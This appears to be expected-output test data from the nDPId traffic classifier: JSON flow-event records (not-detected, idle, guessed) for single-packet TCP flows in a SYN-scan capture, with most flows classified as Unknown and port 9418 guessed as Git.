+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 